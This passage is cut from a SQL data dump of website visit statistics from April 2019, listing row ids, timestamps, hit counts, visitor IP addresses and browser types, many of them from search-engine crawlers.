6935,1,1,0,0,'141.8.142.103','other'),(413944,1555687181,1,1,0,0,'180.76.15.6','other'),(413945,1555687223,1,1,0,0,'37.9.113.148','other'),(413946,1555687232,1,1,0,0,'193.106.30.98','firefox'),(413947,1555687456,2,2,0,0,'87.250.224.81','other'),(413948,1555687929,1,1,0,0,'157.55.39.111','other'),(413949,1555689576,1,1,0,0,'95.27.165.33','msie'),(413950,1555689628,1,1,0,0,'91.196.178.185','chrome'),(413951,1555689773,1,1,0,0,'95.108.213.4','other'),(413952,1555689780,1,1,0,0,'37.9.113.20','other'),(413953,1555690088,1,1,0,0,'66.249.66.220','chrome'),(413954,1555690217,1,1,0,0,'157.55.39.111','other'),(413955,1555690376,1,1,0,0,'46.188.98.10','chrome'),(413956,1555690439,1,1,0,0,'40.77.167.109','other'),(413957,1555690958,2,2,0,0,'46.211.96.146','chrome'),(413958,1555691335,2,2,0,0,'157.55.39.111','other'),(413959,1555694765,1,1,0,0,'207.46.13.193','other'),(413960,1555694773,1,1,0,0,'40.77.167.109','other'),(413961,1555695604,1,1,0,0,'66.249.66.218','chrome'),(413962,1555696119,2,2,0,0,'207.46.13.188','other'),(413963,1555696336,1,1,0,0,'95.108.213.4','other'),(413964,1555696415,3,3,0,0,'178.154.244.11','other'),(413965,1555697073,1,1,0,0,'5.45.207.79','other'),(413966,1555697365,1,1,0,0,'8.29.198.27','other'),(413967,1555697577,1,1,0,0,'8.29.198.25','other'),(413968,1555697868,1,1,0,0,'157.55.39.188','other'),(413969,1555698934,1,1,0,0,'207.46.13.193','other'),(413970,1555699337,1,1,0,0,'207.46.13.188','other'),(413971,1555699755,1,1,0,0,'66.249.66.222','chrome'),(413972,1555700804,1,1,0,0,'207.46.13.193','other'),(413973,1555701892,1,1,0,0,'93.170.217.233','firefox'),(413974,1555703447,1,1,0,0,'157.55.39.188','other'),(413975,1555704297,1,1,0,0,'66.249.66.222','chrome'),(413976,1555706029,1,1,0,0,'180.76.15.137','other'),(413977,1555706873,1,1,0,0,'40.77.167.13','other'),(413978,1555707562,2,2,0,0,'66.249.66.220','chrome'),(413979,1555708213,1,1,0,0,'8.29.198.27','other'),(413980,1555708420,1,1,0,0,'8.29.198.25','other'),(413981,1555708736,1,1,0,0,'40.77.167.153','other'),(413982,1555708811,1,1,0,0,'40.77.167.157','other'),(413983,1555709849,1,1,0,0,'40.77.167.153','other'),(413984,1555711627,2,2,0,0,'66.249.66.218','chrome'),(413985,1555712773,1,1,0,0,'207.46.13.133','other'),(413986,1555712918,1,1,0,0,'193.106.30.98','firefox'),(413987,1555714212,1,1,0,0,'66.249.66.222','chrome'),(413988,1555714506,1,1,0,0,'40.77.167.164','other'),(413989,1555716058,1,1,0,0,'157.55.39.188','other'),(413990,1555717637,1,1,0,0,'40.77.167.164','other'),(413991,1555719063,2,2,0,0,'8.29.198.27','other'),(413992,1555719124,1,1,0,0,'66.249.66.220','chrome'),(413993,1555719162,1,1,0,0,'66.249.66.218','chrome'),(413994,1555719447,3,3,0,0,'157.55.39.212','other'),(413995,1555721891,1,1,0,0,'40.77.167.164','other'),(413996,1555722122,1,1,0,0,'40.77.167.153','other'),(413997,1555722458,1,1,0,0,'5.45.207.19','other'),(413998,1555722869,1,1,0,0,'207.46.13.133','other'),(413999,1555722994,1,1,0,0,'209.17.97.10','other'),(414000,1555723408,14,14,0,0,'144.76.96.236','other'),(414001,1555724403,1,0,1,0,'66.249.66.128',''),(414002,1555725631,1,1,0,0,'157.55.39.212','other'),(414003,1555726344,1,1,0,0,'66.249.66.222','chrome'),(414004,1555728209,1,1,0,0,'104.148.64.26','chrome'),(414005,1555729891,1,1,0,0,'157.55.39.2','other'),(414006,1555729902,1,1,0,0,'8.29.198.25','other'),(414007,1555730001,1,1,0,0,'176.14.242.104','msie'),(414008,1555730104,1,1,0,0,'8.29.198.26','other'),(414009,1555730248,1,1,0,0,'207.46.13.124','other'),(414010,1555730899,59,59,0,0,'173.208.130.202','other'),(414011,1555731681,1,1,0,0,'5.45.207.79','other'),(414012,1555731814,1,1,0,0,'95.108.213.4','other'),(414013,1555732298,2,2,0,0,'5.45.207.19','other'),(414014,1555732351,2,2,0,0,'178.154.244.11','other'),(414015,1555732365,1,1,0,0,'141.8.142.103','other'),(414016,1555732745,1,1,0,0,'87.250.224.65','other'),(414017,1555732995,1,1,0,0,'193.106.30.98','firefox'),(414018,1555733020,1,1,0,0,'87.250.224.47','other'),(414019,1555734318,2,2,0,0,'207.46.13.185','other'),(414020,1555734510,1,1,0,0,'54.184.166.125','other'),(414021,1555734833,2,2,0,0,'178.154.244.11','other'),(414022,1555735508,1,1,0,0,'66.249.66.218','chrome'),(414023,1555735517,1,1,0,0,'207.46.13.185','other'),(414024,1555735613,1,1,0,0,'66.249.66.220','chrome'),(414025,1555736080,1,1,0,0,'109.74.154.72','chrome'),(414026,1555736552,1,1,0,0,'157.55.39.175','other'),(414027,1555737899,1,1,0,0,'178.17.174.229','other'),(414028,1555738550,1,1,0,0,'5.45.207.19','other'),(414029,1555738574,1,1,0,0,'141.8.142.103','other'),(414030,1555738667,1,1,0,0,'66.249.66.128','chrome'),(414031,1555738752,2,2,0,0,'178.154.244.11','other'),(414032,1555738965,1,1,0,0,'66.249.66.222','chrome'),(414033,1555738966,1,1,0,0,'199.247.30.14','firefox'),(414034,1555739432,1,1,0,0,'157.55.39.2','other'),(414035,1555739877,1,1,0,0,'193.106.30.98','firefox'),(414036,1555739956,2,2,0,0,'54.187.101.57','chrome'),(414037,1555740751,1,1,0,0,'8.29.198.25','other'),(414038,1555740943,1,1,0,0,'8.29.198.27','other'),(414039,1555742739,1,1,0,0,'66.249.66.222','chrome'),(414040,1555743407,1,1,0,0,'207.46.13.185','other'),(414041,1555743907,1,1,0,0,'213.180.203.9','other'),(414042,1555743984,1,1,0,0,'178.154.244.11','other'),(414043,1555745480,1,1,0,0,'193.106.30.98','firefox'),(414044,1555745501,1,1,0,0,'141.8.142.103','other'),(414045,1555745680,1,1,0,0,'37.9.113.148','other'),(414046,1555745683,1,1,0,0,'178.154.171.17','other'),(414047,1555746703,1,1,0,0,'207.46.13.185','other'),(414048,1555747641,1,1,0,0,'66.249.66.220','chrome'),(414049,1555748520,2,2,0,0,'207.46.13.168','other'),(414050,1555749104,1,1,0,0,'13.66.139.0','other'),(414051,1555750527,1,1,0,0,'207.46.13.185','other'),(414052,1555750540,2,2,0,0,'40.77.167.152','other'),(414053,1555751090,1,1,0,0,'66.249.66.220','chrome'),(414054,1555751415,1,1,0,0,'212.83.146.233','firefox'),(414055,1555751608,1,1,0,0,'8.29.198.27','other'),(414056,1555751686,1,1,0,0,'40.77.167.102','other'),(414057,1555751735,2,2,0,0,'207.46.13.185','other'),(414058,1555751744,1,1,0,0,'31.184.238.175','chrome'),(414059,1555751778,1,1,0,0,'8.29.198.26','other'),(414060,1555754407,1,1,0,0,'193.106.30.98','firefox'),(414061,1555754468,1,1,0,0,'40.77.167.152','other'),(414062,1555754946,1,1,0,0,'66.249.66.218','chrome'),(414063,1555755440,1,1,0,0,'192.162.35.63','chrome'),(414064,1555755482,1,1,0,0,'5.45.207.79','other'),(414065,1555755932,1,1,0,0,'141.8.142.103','other'),(414066,1555756146,2,2,0,0,'5.45.207.19','other'),(414067,1555756661,1,1,0,0,'178.255.215.94','other'),(414068,1555756863,1,1,0,0,'130.180.220.19','chrome'),(414069,1555757047,1,1,0,0,'66.249.66.222','chrome'),(414070,1555757969,1,1,0,0,'40.77.167.152','other'),(414071,1555759451,1,1,0,0,'5.188.210.44','chrome'),(414072,1555759574,1,1,0,0,'178.154.244.11','other'),(414073,1555760099,1,1,0,0,'52.53.201.78','chrome'),(414074,1555760153,1,1,0,0,'91.196.178.52','chrome'),(414075,1555760206,1,1,0,0,'40.77.167.102','other'),(414076,1555760374,1,1,0,0,'66.249.66.128','chrome'),(414077,1555761026,1,1,0,0,'52.70.146.155','firefox'),(414078,1555761444,1,1,0,0,'193.106.30.98','firefox'),(414079,1555761923,1,1,0,0,'157.55.39.107','other'),(414080,1555762453,2,2,0,0,'8.29.198.26','other'),(414081,1555762793,1,1,0,0,'40.77.167.152','other'),(414082,1555763165,30,30,0,0,'34.228.38.35','other'),(414083,1555764074,23,23,0,0,'34.228.38.35','other'),(414084,1555764556,1,1,0,0,'157.55.39.107','other'),(414085,1555764978,28,28,0,0,'34.228.38.35','other'),(414086,1555765668,1,1,0,0,'207.46.13.243','other'),(414087,1555765879,19,19,0,0,'34.228.38.35','other'),(414088,1555766076,1,1,0,0,'13.66.139.0','other'),(414089,1555766326,1,1,0,0,'40.77.167.111','other'),(414090,1555766833,4,4,0,0,'34.228.38.35','other'),(414091,1555767391,1,1,0,0,'157.55.39.107','other'),(414092,1555768182,1,1,0,0,'193.106.30.98','firefox'),(414093,1555768205,1,1,0,0,'180.76.15.141','other'),(414094,1555769146,1,1,0,0,'213.180.203.9','other'),(414095,1555769257,1,1,0,0,'87.250.224.118','other'),(414096,1555769425,1,1,0,0,'141.8.142.38','other'),(414097,1555769544,1,0,1,0,'66.249.66.222',''),(414098,1555769592,1,1,0,0,'66.249.66.220','chrome'),(414099,1555769627,1,1,0,0,'141.8.132.16','other'),(414100,1555769925,1,1,0,0,'5.255.253.25','other'),(414101,1555770060,1,1,0,0,'5.45.207.8','other'),(414102,1555770065,1,1,0,0,'209.17.97.10','other'),(414103,1555770541,1,1,0,0,'178.154.244.11','other'),(414104,1555770612,1,1,0,0,'207.46.13.10','other'),(414105,1555771684,1,1,0,0,'40.77.167.111','other'),(414106,1555771795,1,1,0,0,'141.8.142.103','other'),(414107,1555771797,1,1,0,0,'95.108.213.50','other'),(414108,1555771943,1,1,0,0,'66.249.66.220','chrome'),(414109,1555771959,1,1,0,0,'5.255.253.25','other'),(414110,1555771967,1,1,0,0,'40.77.167.87','other'),(414111,1555772478,1,1,0,0,'95.163.255.99','other'),(414112,1555773293,1,1,0,0,'8.29.198.27','other'),(414113,1555773454,1,1,0,0,'8.29.198.25','other'),(414114,1555774029,1,1,0,0,'213.180.203.17','other'),(414115,1555774666,1,1,0,0,'40.77.167.87','other'),(414116,1555775019,1,1,0,0,'213.180.203.9','other'),(414117,1555775261,1,1,0,0,'193.106.30.98','firefox'),(414118,1555776302,1,1,0,0,'91.196.178.129','chrome'),(414119,1555778615,1,1,0,0,'91.196.178.129','chrome'),(414120,1555781146,1,1,0,0,'31.43.107.230','chrome'),(414121,1555781261,1,1,0,0,'193.106.30.98','firefox'),(414122,1555781859,2,2,0,0,'87.250.224.47','other'),(414123,1555781913,1,1,0,0,'141.8.142.144','other'),(414124,1555782124,1,1,0,0,'176.113.170.104','chrome'),(414125,1555782153,1,1,0,0,'95.108.213.4','other'),(414126,1555782306,1,1,0,0,'5.45.207.79','other'),(414127,1555782309,1,1,0,0,'141.8.142.108','other'),(414128,1555782371,1,1,0,0,'66.249.66.193','chrome'),(414129,1555782373,1,1,0,0,'37.9.113.103','other'),(414130,1555782549,1,1,0,0,'95.108.181.54','other'),(414131,1555782610,3,3,0,0,'40.77.167.87','other'),(414132,1555783490,1,1,0,0,'13.57.233.99','chrome'),(414133,1555783836,1,1,0,0,'178.154.244.11','other'),(414134,1555783904,1,1,0,0,'40.77.167.139','other'),(414135,1555784032,1,1,0,0,'40.77.167.87','other'),(414136,1555784141,1,1,0,0,'8.29.198.26','other'),(414137,1555784285,1,1,0,0,'8.29.198.27','other'),(414138,1555785118,1,1,0,0,'207.46.13.60','other'),(414139,1555785163,1,1,0,0,'178.154.244.49','other'),(414140,1555785612,1,1,0,0,'207.46.13.82','other'),(414141,1555786964,1,1,0,0,'144.76.236.112','other'),(414142,1555787699,1,1,0,0,'207.46.13.199','other'),(414143,1555788191,1,1,0,0,'207.46.13.2','other'),(414144,1555788205,1,1,0,0,'109.164.108.136','chrome'),(414145,1555789623,1,1,0,0,'193.106.30.98','firefox'),(414146,1555790469,1,1,0,0,'207.46.13.60','other'),(414147,1555790486,1,1,0,0,'207.46.13.199','other'),(414148,1555791537,1,1,0,0,'193.106.30.98','firefox'),(414149,1555791557,1,1,0,0,'5.45.207.19','other'),(414150,1555791946,1,1,0,0,'95.108.213.4','other'),(414151,1555792202,1,1,0,0,'207.46.13.199','other'),(414152,1555792947,1,1,0,0,'40.77.167.139','other'),(414153,1555794130,1,1,0,0,'31.41.93.55','chrome'),(414154,1555794908,2,2,0,0,'40.77.167.139','other'),(414155,1555794988,1,1,0,0,'8.29.198.25','other'),(414156,1555795119,1,1,0,0,'8.29.198.27','other'),(414157,1555795762,1,1,0,0,'207.46.13.60','other'),(414158,1555796255,1,1,0,0,'66.249.66.220','chrome'),(414159,1555796432,1,1,0,0,'157.55.39.151','other'),(414160,1555797754,1,1,0,0,'207.46.13.199','other'),(414161,1555798639,1,1,0,0,'157.55.39.151','other'),(414162,1555798644,1,1,0,0,'178.154.200.48','other'),(414163,1555798900,1,1,0,0,'178.154.244.49','other'),(414164,1555799098,1,1,0,0,'87.250.224.64','other'),(414165,1555799957,1,1,0,0,'207.46.13.199','other'),(414166,1555800429,1,1,0,0,'66.249.66.220','chrome'),(414167,1555800873,1,1,0,0,'46.211.70.28','chrome'),(414168,1555801766,1,1,0,0,'207.46.13.60','other'),(414169,1555802022,1,1,0,0,'193.106.30.98','firefox'),(414170,1555802232,1,1,0,0,'157.55.39.151','other'),(414171,1555802474,1,1,0,0,'207.46.13.163','other'),(414172,1555802534,1,1,0,0,'66.249.66.222','chrome'),(414173,1555802808,1,1,0,0,'66.249.66.128','chrome'),(414174,1555803248,1,1,0,0,'207.46.13.199','other'),(414175,1555803760,1,1,0,0,'66.249.66.130','chrome'),(414176,1555803768,1,1,0,0,'66.249.64.29','chrome'),(414177,1555804183,1,1,0,0,'213.180.203.40','other'),(414178,1555804314,1,1,0,0,'37.9.113.20','other'),(414179,1555804568,2,2,0,0,'66.249.64.31','chrome'),(414180,1555804595,1,1,0,0,'66.249.64.30','chrome'),(414181,1555805492,1,1,0,0,'40.77.167.172','other'),(414182,1555805511,1,1,0,0,'180.76.15.153','other'),(414183,1555805771,1,1,0,0,'66.249.64.29','chrome'),(414184,1555805825,1,1,0,0,'8.29.198.26','other'),(414185,1555805948,1,1,0,0,'8.29.198.27','other'),(414186,1555806084,1,1,0,0,'5.255.253.38','other'),(414187,1555806220,1,1,0,0,'66.249.64.30','chrome'),(414188,1555806724,2,2,0,0,'66.249.64.31','chrome'),(414189,1555807049,2,2,0,0,'157.55.39.151','other'),(414190,1555807439,1,1,0,0,'66.249.64.30','chrome'),(414191,1555808472,1,1,0,0,'66.249.64.29','chrome'),(414192,1555809275,1,1,0,0,'87.250.224.65','other'),(414193,1555809353,1,1,0,0,'87.250.224.81','other'),(414194,1555809422,1,1,0,0,'87.250.224.47','other'),(414195,1555810069,1,1,0,0,'157.55.39.203','other'),(414196,1555810286,1,1,0,0,'66.249.64.29','chrome'),(414197,1555810583,1,1,0,0,'207.46.13.233','other'),(414198,1555810780,1,1,0,0,'66.249.64.30','chrome'),(414199,1555810941,1,1,0,0,'66.249.64.58','chrome'),(414200,1555812010,2,2,0,0,'66.249.64.30','chrome'),(414201,1555812151,6,6,0,0,'5.9.154.69','other'),(414202,1555812462,1,1,0,0,'66.249.64.31','chrome'),(414203,1555812593,1,1,0,0,'66.249.64.60','chrome'),(414204,1555813436,1,1,0,0,'141.8.142.81','other'),(414205,1555813679,1,1,0,0,'66.249.64.31','chrome'),(414206,1555814325,1,1,0,0,'5.45.207.19','other'),(414207,1555814900,2,2,0,0,'66.249.64.30','chrome'),(414208,1555815580,6,6,0,0,'40.77.167.136','other'),(414209,1555815827,9,9,0,0,'207.46.13.233','other'),(414210,1555815840,14,14,0,0,'207.46.13.72','other'),(414211,1555815869,1,1,0,0,'66.249.64.29','chrome'),(414212,1555815885,9,9,0,0,'207.46.13.163','other'),(414213,1555815990,2,2,0,0,'54.202.65.74','chrome'),(414214,1555816668,2,2,0,0,'8.29.198.25','other'),(414215,1555816691,1,1,0,0,'66.249.64.60','chrome'),(414216,1555817061,1,1,0,0,'207.46.13.163','other'),(414217,1555817952,1,1,0,0,'66.249.64.30','chrome'),(414218,1555818231,1,0,1,0,'66.249.64.60',''),(414219,1555818643,1,1,0,0,'66.249.64.62','chrome'),(414220,1555818827,2,2,0,0,'5.45.207.19','other'),(414221,1555819322,1,1,0,0,'66.249.64.58','chrome'),(414222,1555820574,1,1,0,0,'193.106.30.98','firefox'),(414223,1555820754,3,3,0,0,'66.249.64.29','chrome'),(414224,1555820935,1,1,0,0,'40.77.167.136','other'),(414225,1555821070,12,12,0,0,'54.91.121.255','other'),(414226,1555821109,1,1,0,0,'66.249.64.62','chrome'),(414227,1555821233,1,1,0,0,'207.46.13.72','other'),(414228,1555821647,2,2,0,0,'66.249.64.31','chrome'),(414229,1555822057,3,3,0,0,'54.91.121.255','other'),(414230,1555822202,1,1,0,0,'207.46.13.72','other'),(414231,1555822227,1,1,0,0,'40.77.167.136','other'),(414232,1555822347,1,1,0,0,'66.249.64.30','chrome'),(414233,1555822501,1,1,0,0,'66.249.64.62','chrome'),(414234,1555822634,1,1,0,0,'157.55.39.199','other'),(414235,1555822811,1,1,0,0,'109.74.154.72','chrome'),(414236,1555823348,1,1,0,0,'54.91.121.255','other'),(414237,1555823449,1,1,0,0,'66.249.64.31','chrome'),(414238,1555823454,1,1,0,0,'66.249.64.30','chrome'),(414239,1555824024,1,1,0,0,'66.249.64.60','chrome'),(414240,1555824598,1,1,0,0,'185.220.102.7','other'),(414241,1555824852,2,2,0,0,'66.249.64.31','chrome'),(414242,1555824922,1,1,0,0,'207.46.13.233','other'),(414243,1555825035,1,1,0,0,'40.77.167.136','other'),(414244,1555825126,1,1,0,0,'66.249.64.30','chrome'),(414245,1555825476,1,1,0,0,'207.46.13.72','other'),(414246,1555826748,3,3,0,0,'66.249.64.30','chrome'),(414247,1555826792,1,1,0,0,'66.249.64.29','chrome'),(414248,1555826818,1,1,0,0,'193.106.30.98','firefox'),(414249,1555826946,1,1,0,0,'207.46.13.233','other'),(414250,1555827142,1,1,0,0,'5.45.207.19','other'),(414251,1555827264,1,1,0,0,'66.249.64.31','chrome'),(414252,1555827337,1,1,0,0,'46.133.192.64','chrome'),(414253,1555827522,1,1,0,0,'8.29.198.27','other'),(414254,1555827610,1,1,0,0,'8.29.198.25','other'),(414255,1555828832,1,1,0,0,'207.46.13.233','other'),(414256,1555828836,2,2,0,0,'66.249.64.30','chrome'),(414257,1555828867,1,1,0,0,'95.108.213.50','other'),(414258,1555829674,1,1,0,0,'95.163.255.185','other'),(414259,1555829878,2,2,0,0,'207.46.13.233','other'),(414260,1555830935,1,1,0,0,'89.178.103.132','firefox'),(414261,1555831110,1,1,0,0,'40.77.167.136','other'),(414262,1555831301,1,1,0,0,'180.76.15.161','other'),(414263,1555831645,1,1,0,0,'207.46.13.72','other'),(414264,1555831856,1,1,0,0,'66.249.64.29','chrome'),(414265,1555832097,1,1,0,0,'66.249.64.30','chrome'),(414266,1555832649,1,1,0,0,'78.111.186.36','chrome'),(414267,1555832699,1,1,0,0,'213.180.203.17','other'),(414268,1555833188,1,1,0,0,'207.46.13.73','other'),(414269,1555833341,1,1,0,0,'66.249.64.30','chrome'),(414270,1555833933,1,1,0,0,'66.249.64.60','chrome'),(414271,1555834159,1,1,0,0,'157.55.39.72','other'),(414272,1555834475,1,1,0,0,'66.249.64.30','chrome'),(414273,1555835330,1,1,0,0,'66.249.64.62','chrome'),(414274,1555835560,3,3,0,0,'66.249.64.31','chrome'),(414275,1555835583,2,2,0,0,'157.55.39.199','other'),(414276,1555835932,1,1,0,0,'46.211.97.189','chrome'),(414277,1555836108,1,1,0,0,'66.249.64.30','chrome'),(414278,1555837435,2,2,0,0,'66.249.64.31','chrome'),(414279,1555837552,1,1,0,0,'157.55.39.72','other'),(414280,1555837671,1,1,0,0,'141.8.142.103','other'),(414281,1555837693,1,1,0,0,'66.249.64.62','chrome'),(414282,1555837870,1,1,0,0,'157.55.39.165','other'),(414283,1555838361,2,2,0,0,'8.29.198.25','other'),(414284,1555840361,1,1,0,0,'66.249.64.30','chrome'),(414285,1555840629,1,1,0,0,'66.249.64.29','chrome'),(414286,1555840877,1,1,0,0,'66.249.64.31','chrome'),(414287,1555841810,2,2,0,0,'66.249.64.29','chrome'),(414288,1555842057,1,1,0,0,'139.99.222.34','other'),(414289,1555842386,2,2,0,0,'93.119.227.91','firefox'),(414290,1555842751,2,2,0,0,'106.120.173.109','other'),(414291,1555842802,1,1,0,0,'178.154.244.11','other'),(414292,1555842925,1,1,0,0,'66.249.64.31','chrome'),(414293,1555843401,1,1,0,0,'5.45.207.19','other'),(414294,1555845082,2,2,0,0,'66.249.64.31','chrome'),(414295,1555845879,1,1,0,0,'91.209.11.236','other'),(414296,1555846243,1,1,0,0,'193.106.30.98','firefox'),(414297,1555846482,1,1,0,0,'157.55.39.212','other'),(414298,1555846554,1,1,0,0,'180.76.15.15','other'),(414299,1555847048,1,1,0,0,'157.55.39.72','other'),(414300,1555847351,1,1,0,0,'5.45.207.19','other'),(414301,1555847397,1,1,0,0,'95.108.213.4','other'),(414302,1555847491,1,1,0,0,'5.45.207.79','other'),(414303,1555848039,1,1,0,0,'78.111.187.75','chrome'),(414304,1555848515,1,1,0,0,'157.55.39.244','other'),(414305,1555849221,1,1,0,0,'8.29.198.26','other'),(414306,1555849275,1,1,0,0,'8.29.198.27','other'),(414307,1555849643,1,1,0,0,'139.99.222.34','other'),(414308,1555851385,1,1,0,0,'66.249.64.31','chrome'),(414309,1555851606,1,1,0,0,'66.249.64.30','chrome'),(414310,1555851731,1,1,0,0,'66.249.64.29','chrome'),(414311,1555851806,1,1,0,0,'157.55.39.72','other'),(414312,1555852244,1,1,0,0,'5.45.207.19','other'),(414313,1555852248,1,1,0,0,'141.8.142.103','other'),(414314,1555852300,1,1,0,0,'193.106.30.98','firefox'),(414315,1555852880,1,1,0,0,'178.154.244.11','other'),(414316,1555853516,1,1,0,0,'66.249.64.31','chrome'),(414317,1555853897,1,1,0,0,'192.162.35.63','chrome'),(414318,1555854142,1,1,0,0,'176.98.95.243','firefox'),(414319,1555854901,1,1,0,0,'66.249.64.60','chrome'),(414320,1555854952,4,4,0,0,'66.249.64.30','chrome'),(414321,1555854964,2,2,0,0,'207.46.13.173','other'),(414322,1555855654,2,2,0,0,'157.55.39.244','other'),(414323,1555856126,1,1,0,0,'66.249.64.31','chrome'),(414324,1555856546,1,1,0,0,'188.163.92.100','chrome'),(414325,1555856573,1,1,0,0,'5.45.207.19','other'),(414326,1555857435,1,1,0,0,'66.249.64.30','chrome'),(414327,1555857831,2,2,0,0,'157.55.39.81','other'),(414328,1555857835,1,1,0,0,'66.249.64.29','chrome'),(414329,1555857850,1,1,0,0,'188.163.92.100','chrome'),(414330,1555858219,1,1,0,0,'5.255.253.38','other'),(414331,1555858376,1,1,0,0,'178.154.171.27','other'),(414332,1555858399,1,1,0,0,'213.180.203.53','other'),(414333,1555858424,1,1,0,0,'66.249.64.31','chrome'),(414334,1555858455,1,1,0,0,'95.108.213.4','other'),(414335,1555858497,1,1,0,0,'37.9.113.148','other'),(414336,1555858534,1,1,0,0,'157.55.39.212','other'),(414337,1555859274,1,1,0,0,'82.207.47.76','chrome'),(414338,1555860057,1,1,0,0,'8.29.198.25','other'),(414339,1555860122,1,1,0,0,'8.29.198.26','other'),(414340,1555861401,2,2,0,0,'66.249.64.31','chrome'),(414341,1555862574,1,1,0,0,'82.207.44.103','chrome'),(414342,1555863073,1,1,0,0,'180.76.15.9','other'),(414343,1555863153,1,1,0,0,'207.46.13.173','other'),(414344,1555863619,1,1,0,0,'157.55.39.244','other'),(414345,1555865705,1,0,1,0,'66.249.64.29',''),(414346,1555866264,1,1,0,0,'66.249.64.30','chrome'),(414347,1555867339,2,2,0,0,'66.249.64.30','chrome'),(414348,1555867730,1,1,0,0,'91.196.178.80','firefox'),(414349,1555868117,1,1,0,0,'66.249.64.60','chrome'),(414350,1555868592,1,1,0,0,'95.108.213.4','other'),(414351,1555868627,1,1,0,0,'5.45.207.19','other'),(414352,1555868633,1,1,0,0,'5.45.207.79','other'),(414353,1555868918,1,1,0,0,'66.249.64.30','chrome'),(414354,1555869159,1,1,0,0,'157.55.39.179','other'),(414355,1555869366,1,1,0,0,'66.249.64.29','chrome'),(414356,1555869561,1,1,0,0,'178.154.244.11','other'),(414357,1555869727,1,1,0,0,'5.45.207.19','other'),(414358,1555869772,1,1,0,0,'66.249.64.31','chrome'),(414359,1555870192,7,7,0,0,'157.55.39.81','other'),(414360,1555870199,9,9,0,0,'157.55.39.172','other'),(414361,1555870207,4,4,0,0,'207.46.13.156','other'),(414362,1555870213,6,6,0,0,'207.46.13.155','other'),(414363,1555870547,1,1,0,0,'193.106.30.98','firefox'),(414364,1555870670,1,1,0,0,'66.249.64.60','chrome'),(414365,1555870700,1,1,0,0,'66.249.64.31','chrome'),(414366,1555870898,1,1,0,0,'8.29.198.27','other'),(414367,1555870959,1,1,0,0,'8.29.198.25','other'),(414368,1555871260,1,1,0,0,'157.55.39.81','other'),(414369,1555871287,1,1,0,0,'141.8.142.103','other'),(414370,1555871493,1,1,0,0,'66.249.64.29','chrome'),(414371,1555871707,1,1,0,0,'66.249.64.62','chrome'),(414372,1555871882,2,2,0,0,'66.249.64.31','chrome'),(414373,1555872400,1,1,0,0,'157.55.39.81','other'),(414374,1555873384,1,1,0,0,'207.46.13.156','other'),(414375,1555873501,1,1,0,0,'66.249.64.31','chrome'),(414376,1555873877,1,1,0,0,'213.180.203.40','other'),(414377,1555874096,1,1,0,0,'141.8.142.103','other'),(414378,1555874137,1,1,0,0,'5.45.207.19','other'),(414379,1555874744,1,1,0,0,'66.249.64.29','chrome'),(414380,1555875372,2,2,0,0,'66.249.64.31','chrome'),(414381,1555875680,1,1,0,0,'185.30.202.99','chrome'),(414382,1555876142,1,1,0,0,'157.55.39.172','other'),(414383,1555876254,1,1,0,0,'66.249.64.30','chrome'),(414384,1555876811,1,1,0,0,'185.30.202.99','chrome'),(414385,1555877114,2,2,0,0,'66.249.64.31','chrome'),(414386,1555877470,1,1,0,0,'91.196.178.134','chrome'),(414387,1555878429,1,1,0,0,'95.108.181.75','other'),(414388,1555878431,1,1,0,0,'213.180.203.17','other'),(414389,1555878512,1,1,0,0,'207.46.13.156','other'),(414390,1555879061,1,1,0,0,'66.249.64.30','chrome'),(414391,1555879147,1,1,0,0,'66.249.64.31','chrome'),(414392,1555879591,1,1,0,0,'213.180.203.53','other'),(414393,1555879828,1,1,0,0,'91.209.11.236','other'),(414394,1555880772,1,1,0,0,'66.249.64.30','chrome'),(414395,1555880982,1,1,0,0,'66.249.64.62','chrome'),(414396,1555881099,2,2,0,0,'207.46.13.156','other'),(414397,1555881187,1,1,0,0,'40.77.167.42','other'),(414398,1555881472,1,1,0,0,'66.249.64.29','chrome'),(414399,1555881736,1,1,0,0,'8.29.198.25','other'),(414400,1555881789,1,1,0,0,'8.29.198.27','other'),(414401,1555882581,1,1,0,0,'66.249.64.58','chrome'),(414402,1555882644,1,1,0,0,'40.77.167.22','other'),(414403,1555882652,1,1,0,0,'176.31.73.4','firefox'),(414404,1555882782,1,1,0,0,'213.180.203.17','other'),(414405,1555882816,1,1,0,0,'66.249.64.60','chrome'),(414406,1555883235,1,1,0,0,'213.180.203.53','other'),(414407,1555883244,1,1,0,0,'87.250.224.65','other'),(414408,1555883264,1,1,0,0,'213.180.203.23','other'),(414409,1555883409,1,1,0,0,'193.106.30.98','firefox'),(414410,1555884612,1,1,0,0,'207.46.13.156','other'),(414411,1555886221,1,1,0,0,'213.180.203.17','other'),(414412,1555886745,1,1,0,0,'66.249.64.31','chrome'),(414413,1555886921,1,1,0,0,'40.77.167.22','other'),(414414,1555887940,1,1,0,0,'95.108.213.4','other'),(414415,1555888191,1,1,0,0,'5.45.207.79','other'),(414416,1555889542,1,1,0,0,'5.45.207.19','other'),(414417,1555889696,1,1,0,0,'157.55.39.172','other'),(414418,1555891212,1,1,0,0,'193.106.30.98','firefox'),(414419,1555891352,1,1,0,0,'40.77.167.42','other'),(414420,1555892303,1,1,0,0,'157.55.39.52','other'),(414421,1555892573,1,1,0,0,'8.29.198.27','other'),(414422,1555892615,1,1,0,0,'8.29.198.26','other'),(414423,1555893579,1,1,0,0,'37.9.113.103','other'),(414424,1555893629,1,1,0,0,'87.250.224.65','other'),(414425,1555893725,1,1,0,0,'141.8.142.103','other'),(414426,1555893817,1,1,0,0,'178.154.244.11','other'),(414427,1555894629,1,1,0,0,'5.45.207.19','other'),(414428,1555896346,1,1,0,0,'40.77.167.22','other'),(414429,1555897405,1,1,0,0,'40.77.167.22','other'),(414430,1555897916,2,2,0,0,'34.218.74.55','other'),(414431,1555898146,1,1,0,0,'193.106.30.98','firefox'),(414432,1555898390,1,1,0,0,'157.55.39.52','other'),(414433,1555898468,2,2,0,0,'5.45.207.79','other'),(414434,1555900565,1,1,0,0,'66.249.64.31','chrome'),(414435,1555900593,1,1,0,0,'40.77.167.171','other'),(414436,1555901216,1,1,0,0,'5.45.207.79','other'),(414437,1555901344,1,1,0,0,'40.77.167.16','other'),(414438,1555901569,2,2,0,0,'34.212.139.60','chrome'),(414439,1555902496,2,2,0,0,'157.55.39.113','other'),(414440,1555902590,1,1,0,0,'66.249.64.29','chrome'),(414441,1555902831,1,1,0,0,'157.55.39.52','other'),(414442,1555903071,1,1,0,0,'40.77.167.171','other'),(414443,1555903403,1,1,0,0,'8.29.198.27','other'),(414444,1555903451,1,1,0,0,'8.29.198.25','other'),(414445,1555903782,1,1,0,0,'193.106.30.98','firefox'),(414446,1555903993,1,1,0,0,'66.249.64.58','chrome'),(414447,1555904212,1,1,0,0,'66.249.64.29'